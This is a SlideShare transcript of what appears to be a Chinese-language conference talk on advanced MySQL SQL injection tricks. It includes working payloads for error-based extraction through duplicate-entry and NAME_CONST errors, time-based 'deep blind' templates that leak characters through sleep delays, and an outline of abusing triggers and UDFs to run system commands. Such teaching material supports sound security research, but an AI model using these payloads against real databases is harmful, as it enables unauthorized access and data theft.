Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
關於SQL Injection的那些奇技淫巧              Orange@chroot.org
SQL Injection ?
•   Havij•   Pangolin•   DSQL tool•   NBSI / HBSI•   BSQL Hacker•   Domain tools•   SQLmap etc……
This talk is about MySQL !
MySQL Injection (Maybe you know)• Get data                    • Others  – Blind Injection             – Information_schema...
MySQL Injection (Maybe you knowmore.)• Get data                    • Others  – Blind Injection             – Information_s...
MySQL Development History     Feature                               MySQL Series  1 Unions                                ...
MySQL (1/3)• Get data                    • Others  – Blind Injection             – Information_schema     • True and False...
Error Base Injection• Like Injection in SQL server• When to use ?  – Insert injection  – Update injection  – 同樣參數在多個 table...
Select * from (Select 1,1) as x     Duplicate column name 1
Select * from (select * from user as a          join user as b) as x       Duplicate column name Host
Select * from (select * from user as a   join user as b using(Host)) as x       Duplicate column name User
Select * from (Select user(),user()) as x           Will show user name ?
NoDuplicate column name user()
NAME_CONST(name ,value)Causes the column to have the given name.
SelectNAME_CONST(a,1),NAME_CONST(b,2)  a            b  1            2
Select * from (SelectNAME_CONST(user(),1),NAME_CONST(user(),1))          as x
MySQL patched it• MySQL > 5.1  – NAME_CONST() can not use again.  – Argument must be const.
• select * from (select count(*),concat((select  (select user()) from  information_schema.tables limit 0,1),  floor(rand(0...
What is Duplicate Entry Error?
SELECT *FROM (       SELECT COUNT( * ) , CONCAT( USER( ) , FLOOR    2 ( RAND( ) *2 ) )       FROM mysql.user       GROUP B...
Demo
MySQL (2/3)• Get data                       • Others  – Blind Injection                – Information_schema        • True ...
Deep Blind Injection• Status 200 or 500 ?• Time base quick or slow ?• a -> 0x97  – 9 -> delay 9 seconds  – 7 -> delay 7 se...
Deep Blind InjectionDECLARE @x as int;DECLARE @w as char(6);SET@x=ASCII(SUBSTRING(master.dbo.fn_varbintohexstr(CAST({QUERY...
Deep Blind Injection• if(        ord(substring(hex(user()),1,1))>=97,        sleep(ord(substring(hex(user()),1,1))-87),   ...
MySQL (3/3)• Get data                    • Others  – Blind Injection             – Information_schema     • True and False...
MySQL Triggers   A trigger is a named database object that isassociated with a table, and that activates when a       part...
When a triggers created• MySQL/data/database/  – table_name.TRG  – atk.TRN• When update/delete/insert will check above  fi...
How to Exploit it• Update / Insert data ?• Add a MySQL account ?• Exploit it with UDF ?  – Cause the MySQL server stop.  –...
Demo
Thanks : )
Upcoming SlideShare
Loading in …5
×

關於SQL Injection的那些奇技淫巧

4,915 views

Published on

Published in: Technology
  • Be the first to comment

關於SQL Injection的那些奇技淫巧

  1. 1. 關於SQL Injection的那些奇技淫巧 Orange@chroot.org
  2. 2. SQL Injection ?
  3. 3. • Havij• Pangolin• DSQL tool• NBSI / HBSI• BSQL Hacker• Domain tools• SQLmap etc……
  4. 4. This talk is about MySQL !
  5. 5. MySQL Injection (Maybe you know)• Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection• Read / Write – Load_file – Into outfile
  6. 6. MySQL Injection (Maybe you knowmore.)• Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection• Read / Write – Load_file – Into outfile
  7. 7. MySQL Development History Feature MySQL Series 1 Unions 4.0 Subqueries 2 4.1 R-trees 4.1 (for the MyISAM storage engine) Stored procedures and functions 3 5.0 Views 5.0 Cursors 5.0 XA transactions 5.0 Triggers 4 5.0 and 5.1 Event scheduler 5.1 Partitioning 5.1 Pluggable storage engine API 5.1 Plugin API 5.1 InnoDB Plugin 5.1 Row-based replication 5.1 Server log tables 5.1
  8. 8. MySQL (1/3)• Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection• Read / Write – Load_file – Into outfile
  9. 9. Error Base Injection• Like Injection in SQL server• When to use ? – Insert injection – Update injection – 同樣參數在多個 table 查詢中 – Query 的資訊不會顯示在頁面中• How to implement ? – Duplicate Error – Function Error
  10. 10. Select * from (Select 1,1) as x Duplicate column name 1
  11. 11. Select * from (select * from user as a join user as b) as x Duplicate column name Host
  12. 12. Select * from (select * from user as a join user as b using(Host)) as x Duplicate column name User
  13. 13. Select * from (Select user(),user()) as x Will show user name ?
  14. 14. NoDuplicate column name user()
  15. 15. NAME_CONST(name ,value)Causes the column to have the given name.
  16. 16. SelectNAME_CONST(a,1),NAME_CONST(b,2) a b 1 2
  17. 17. Select * from (SelectNAME_CONST(user(),1),NAME_CONST(user(),1)) as x
  18. 18. MySQL patched it• MySQL > 5.1 – NAME_CONST() can not use again. – Argument must be const.
  19. 19. • select * from (select count(*),concat((select (select user()) from information_schema.tables limit 0,1), floor(rand(0)*2)) as x from information_schema.tables group by x) as a• ERROR 1062 (23000): Duplicate entry root@localhost1 for key 1
  20. 20. What is Duplicate Entry Error?
  21. 21. SELECT *FROM ( SELECT COUNT( * ) , CONCAT( USER( ) , FLOOR 2 ( RAND( ) *2 ) ) FROM mysql.user GROUP BY 2) AS a 1• ERROR 1062 (23000): Duplicate entry root@localhost1 for key 1
  22. 22. Demo
  23. 23. MySQL (2/3)• Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection• I/O – Load_file – Into outfile
  24. 24. Deep Blind Injection• Status 200 or 500 ?• Time base quick or slow ?• a -> 0x97 – 9 -> delay 9 seconds – 7 -> delay 7 seconds• So, one char can be solved in two requests.
  25. 25. Deep Blind InjectionDECLARE @x as int;DECLARE @w as char(6);SET@x=ASCII(SUBSTRING(master.dbo.fn_varbintohexstr(CAST({QUERY} asvarbinary(8000))),{POSITION},1));IF @x>=97 SET @x=@x-87 ELSE SET @x=@x-48;SET @w=0:0:+CAST(@x*{SECONDS} as char);WAITFOR DELAY @w
  26. 26. Deep Blind Injection• if( ord(substring(hex(user()),1,1))>=97, sleep(ord(substring(hex(user()),1,1))-87), sleep(ord(substring(hex(user()),1,1))-48))Implemented by BSQL Hacker
  27. 27. MySQL (3/3)• Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Triggers • Deep Blind Injection – Union Injection – Error Base Injection• Read / Write – Load_file – Into outfile
  28. 28. MySQL Triggers A trigger is a named database object that isassociated with a table, and that activates when a particular event occurs for the table.
  29. 29. When a triggers created• MySQL/data/database/ – table_name.TRG – atk.TRN• When update/delete/insert will check above file.• Generate by self ?
  30. 30. How to Exploit it• Update / Insert data ?• Add a MySQL account ?• Exploit it with UDF ? – Cause the MySQL server stop. – Maybe a Security Feature or a Bug.• A SQL injection can run system command !
  31. 31. Demo
  32. 32. Thanks : )

×